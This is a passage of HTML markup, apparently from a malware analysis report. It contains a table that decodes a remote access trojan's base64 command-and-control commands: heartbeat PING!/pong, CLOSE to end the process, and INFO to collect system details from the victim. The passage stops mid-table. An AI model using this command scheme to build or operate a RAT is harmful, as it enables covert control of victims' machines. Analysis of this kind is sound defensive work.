!important;"><b>ncoded command</b></span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="FirstRow SCXW93055062 BCX4" role="columnheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1532171558" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{84}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><b>Decoded command</b></span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="FirstRow LastCol SCXW93055062 BCX4" role="columnheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1225610095" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{91}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><b>Purpose</b></span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="2" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1905263850" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{99}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">cG9uZw==</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="472400457" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{106}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">pong</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="756197888" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{113}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Heartbeat response</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="3" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="515883790" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{121}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">UElORyE</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1675936935" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{128}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">PING!</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="466857764" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{135}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Heartbeat request</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="980466928" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{143}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Q0xPU0U=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1112410224" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{150}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">CLOSE</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1726760127" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{157}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Terminate<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">RAT process</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="5" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="790968210" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{167}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">SU5GTw==</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="623138982" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{174}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">INFO</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1739590389" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{181}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">collects OS edition, architecture, and hardware details from the victim machine</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="6" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1061882132" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{189}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; 